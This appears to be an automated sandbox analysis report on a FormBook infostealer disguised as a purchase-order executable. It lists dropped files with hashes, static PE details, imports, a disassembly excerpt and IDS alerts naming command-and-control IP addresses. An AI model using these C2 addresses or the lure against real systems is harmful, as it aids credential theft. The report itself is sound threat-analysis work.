                        Preview:..u..3RNC...\..d.V4..m3R...NCFU1UFOJEXEV7QILE0ZO3RNCFU1UF.JEXKI._I.L.{.2..b.=X&f?8*?77Zq*-+^5;.0+c4 _u/!j...vZ>-)k=WE.RNCFU1U?NC.e%1.l)+..:(.H..oQ2.U..y6P.S...f/T..*%=.5!.JEXEV7QI..0Z.2SNi".iUFOJEXEV.QKMN1QO3.JCFU1UFOJExQV7QYLE0*K3RN.FU!UFOHEXCV7QILE0\O3RNCFU1%BOJGXEV7QINEp.O3BNCVU1UF_JEHEV7QILU0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXk"R)=LE0^.7RNSFU1.BOJUXEV7QILE0ZO3RNcFUQUFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU

                        C:\Users\user\AppData\Local\Temp\autDA7C.tmp

                        Download File
                        Process:C:\Users\user\Desktop\PO_987654345678.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):289280
                        Entropy (8bit):7.994772609984253
                        Encrypted:true
                        SSDEEP:6144:COx1UV7WGHK6uWBM6NGBX4V4AzoB5vZx/BB26jX+EmVaaGFFcqaJJOeMO:CO/QZ5pV4vtXXI/uFcqaJJ3MO
                        MD5:9E727CACC162F14482B7C2077F0D7109
                        SHA1:E35B92081819C2E5CAC12CC88C9687C3CE9FBF07
                        SHA-256:DEBE93B072D3A70C2AA37FADC6073DDF5C9C80CFD24F6FA8247014B5282A307A
                        SHA-512:BBA1C85B2106AD4685A6B7AE72E77EE03B8A551271BB965A54D2941E827309DEC555D1C7B52CA5F7FCD892357568E424D4476988C3C17AD744CFDB9D133FE128
                        Malicious:false
                        Reputation:low
                        Preview:..u..3RNC...\..d.V4..m3R...NCFU1UFOJEXEV7QILE0ZO3RNCFU1UF.JEXKI._I.L.{.2..b.=X&f?8*?77Zq*-+^5;.0+c4 _u/!j...vZ>-)k=WE.RNCFU1U?NC.e%1.l)+..:(.H..oQ2.U..y6P.S...f/T..*%=.5!.JEXEV7QI..0Z.2SNi".iUFOJEXEV.QKMN1QO3.JCFU1UFOJExQV7QYLE0*K3RN.FU!UFOHEXCV7QILE0\O3RNCFU1%BOJGXEV7QINEp.O3BNCVU1UF_JEHEV7QILU0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXk"R)=LE0^.7RNSFU1.BOJUXEV7QILE0ZO3RNcFUQUFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU

                        C:\Users\user\AppData\Local\Temp\autDAAC.tmp

                        Download File
                        Process:C:\Users\user\Desktop\PO_987654345678.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14502
                        Entropy (8bit):7.6194755282159985
                        Encrypted:false
                        SSDEEP:384:fKlUKTgVbU+n6BmD89zY14FrJMz8omo7LC1:fKlUKi4i1w2Q6y
                        MD5:E2A2D367E6B998962F5FCEDD000E0260
                        SHA1:89C2C43AE8EE439726FF80499057BCECB3B0EC69
                        SHA-256:D2890512351C2F74A855123B14D3494676E6F7B020342B231E4053BEABBF1BB0
                        SHA-512:F9E3A657871992F189CACF874C5F0E3ABE79B8FBA802662D243716D9F16766EF5A4699AC2DFF67302F0ADA26F858A3E2033EB10A915AED4A7F7A92BA1976A821
                        Malicious:false
                        Reputation:low
                        Preview:EA06..0..M...../...c..f@.[....P.].@.[..+8.2.f`........e..:......7..7..#|Sp.....?. ... .....|. ..`....C.j.}.X..75.}......`.}.@(>...Y..w4.m....0....,.....}|.0....r............._|S.*......0.o..w...F...;...|60).....|3@...h.Q.L@%.7.......7.T.g.*.5..?.......2.F.g.......5.f...y4.^...>p......B...|.._...?v`Q......M....(...=.....c...f.....W.9......3._.@..e...A..k ...a....O>).4..f.}..?...3 ....C......#.X.g.8.... 6.......1.Y.F?.....Gc.....@#...........l`F..E..c........#..]..c...A....<|.....<~.._.]..........y4...@.~{02/.3...._4...v .O.....|.@jO......M..>`.......|.~....,.m.X..&.........>.. >p5....<~.P....a..@..9.Z.,.X.X...4.,...O~p..L.C....A..2.......p&.....K..@..b....@..X.G.3.............. ..?..@|.._<..C....|.P...n.y..@...).j.+.X.->..(..a.&.l......k......>p........X..P!~M..>`./...-..#?......#.^|._.....[....| 7...g.0.h.,aU_.B....Y...}..<...| ..<........|>)..V.....$........B~..A.......|V ./....)_.4..S..J.@H...7..<#.....~3p............> g/..o. ...d).....`5...W..%..D..

                        C:\Users\user\AppData\Local\Temp\done

                        Download File
                        Process:C:\Users\user\Desktop\PO_987654345678.exe
                        File Type:ASCII text, with very long lines (65536), with no line terminators
                        Category:dropped
                        Size (bytes):143370
                        Entropy (8bit):2.6635439737859765
                        Encrypted:false
                        SSDEEP:384:qrYq11YnBr4syyK6/nbWHHnv+ml+uGYNb3WUgQNm0LYQ:4
                        MD5:F654070822A72E49D2736DB338C9CF67
                        SHA1:0BDD7830B96EFF994443226E42341ADDFA2EFF56
                        SHA-256:172337F9788D3B2A89E4BF6A8EF263930C4F7C87740DAE6DED84E454FBC0B639
                        SHA-512:5077A079CBDA6321DF08574566D8F14B367F98A07ECA703FB219B74463C4144DF0A4726EC51B595B45D6F8113DB3512EFD0A1D21C03318925CE3D5B539C805AA
                        Malicious:false
                        Reputation:low
                        Preview:06504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504c650426504c6504d65045650456504e6504b65048650406504c650436504365042650406504b6504e6504c6504f65045650446504b6504865040650406504065040650406504065040650406504c6504f6504565044650476504c65047650406504b6504e6504c6504f6504d650446504965048650486504f6504d650446504b6504865048650406504465047650406504c65045650486504065040650406504065040650406504c6504865045650496504f6504f6504f6504f6504a650466504065045650486504f65045650446504d650486504465042650446504765040650406504

                        C:\Users\user\AppData\Local\Temp\x--942kI

                        Download File
                        Process:C:\Windows\SysWOW64\chkntfs.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.135919783223942
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:PO_987654345678.exe
                        File size:1'250'816 bytes
                        MD5:4214be98801c44f69b60490a3321e940
                        SHA1:df33635a4f458821d10ce62860a043a960ced09f
                        SHA256:416e839248fccc61a17a02d1513127612b89425f45ddf603800f1def225adb07
                        SHA512:4f24a5ab7dc49ebbccae771dacdd4dd630d57b5691790527f2896d6547318edc846b4bb294b7cf49cc156c234a8d38fc9511c782d7008538b419d626c2d5d413
                        SSDEEP:24576:vqDEvCTbMWu7rQYlBQcBiT6rprG8aVnLgmDaEBVycKdrd8gx:vTvC/MTQYxsWR7aVnLv2msrSg
                        TLSH:A745CF0273D1C062FF9B92334F5AE6515BBC69260123E61F13A81DB9BE701B1563E7A3
                        File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                        File Icon

                        Icon Hash:aaf3e3e3938382a0

                        Static PE Info

                        General

                        Entrypoint:0x420577
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66D4F8E6 [Sun Sep 1 23:29:42 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:948cc502fe9226992dce9417f952fce3

                        Entrypoint Preview

                        Instruction
                        call 00007F8C448C7663h
                        jmp 00007F8C448C6F6Fh
                        push ebp
                        mov ebp, esp
                        push esi
                        push dword ptr [ebp+08h]
                        mov esi, ecx
                        call 00007F8C448C714Dh
                        mov dword ptr [esi], 0049FDF0h
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        and dword ptr [ecx+04h], 00000000h
                        mov eax, ecx
                        and dword ptr [ecx+08h], 00000000h
                        mov dword ptr [ecx+04h], 0049FDF8h
                        mov dword ptr [ecx], 0049FDF0h
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        push dword ptr [ebp+08h]
                        mov esi, ecx
                        call 00007F8C448C711Ah
                        mov dword ptr [esi], 0049FE0Ch
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        and dword ptr [ecx+04h], 00000000h
                        mov eax, ecx
                        and dword ptr [ecx+08h], 00000000h
                        mov dword ptr [ecx+04h], 0049FE14h
                        mov dword ptr [ecx], 0049FE0Ch
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        mov esi, ecx
                        lea eax, dword ptr [esi+04h]
                        mov dword ptr [esi], 0049FDD0h
                        and dword ptr [eax], 00000000h
                        and dword ptr [eax+04h], 00000000h
                        push eax
                        mov eax, dword ptr [ebp+08h]
                        add eax, 04h
                        push eax
                        call 00007F8C448C9D0Dh
                        pop ecx
                        pop ecx
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        lea eax, dword ptr [ecx+04h]
                        mov dword ptr [ecx], 0049FDD0h
                        push eax
                        call 00007F8C448C9D58h
                        pop ecx
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        mov esi, ecx
                        lea eax, dword ptr [esi+04h]
                        mov dword ptr [esi], 0049FDD0h
                        push eax
                        call 00007F8C448C9D41h
                        test byte ptr [ebp+08h], 00000001h
                        pop ecx

                        Rich Headers

                        Programming Language:
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x5ab0c.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x12f0000x7594.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0xd40000x5ab0c0x5ac008b0b669b687608340c32630295e56c2fFalse0.9275891012396694data7.893638866117766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x12f0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                        RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                        RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                        RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                        RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                        RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                        RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                        RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                        RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                        RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                        RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                        RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                        RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                        RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                        RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                        RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                        RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                        RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                        RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                        RT_RCDATA0xdc7b80x51dd2data1.0003310330019026
                        RT_GROUP_ICON0x12e58c0x76dataEnglishGreat Britain0.6610169491525424
                        RT_GROUP_ICON0x12e6040x14dataEnglishGreat Britain1.25
                        RT_GROUP_ICON0x12e6180x14dataEnglishGreat Britain1.15
                        RT_GROUP_ICON0x12e62c0x14dataEnglishGreat Britain1.25
                        RT_VERSION0x12e6400xdcdataEnglishGreat Britain0.6181818181818182
                        RT_MANIFEST0x12e71c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                        Imports

                        DLLImport
                        WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                        MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                        WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                        PSAPI.DLLGetProcessMemoryInfo
                        IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                        USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                        UxTheme.dllIsThemeActive
                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                        USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                        GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                        SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                        OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishGreat Britain

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                        2024-09-03T10:44:01.742289+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316497980192.168.2.4154.23.184.240
                        2024-09-03T10:44:01.742289+0200TCP2856318ETPRO MALWARE FormBook CnC Checkin (POST) M416497980192.168.2.4154.23.184.240
                        2024-09-03T10:45:04.484356+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316499580192.168.2.45.144.130.52
                        2024-09-03T10:45:07.030105+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316499680192.168.2.45.144.130.52
                        2024-09-03T10:45:39.695804+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316500180192.168.2.4161.97.168.245
                        2024-09-03T10:46:04.760330+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M316500880192.168.2.4218.247.68.184
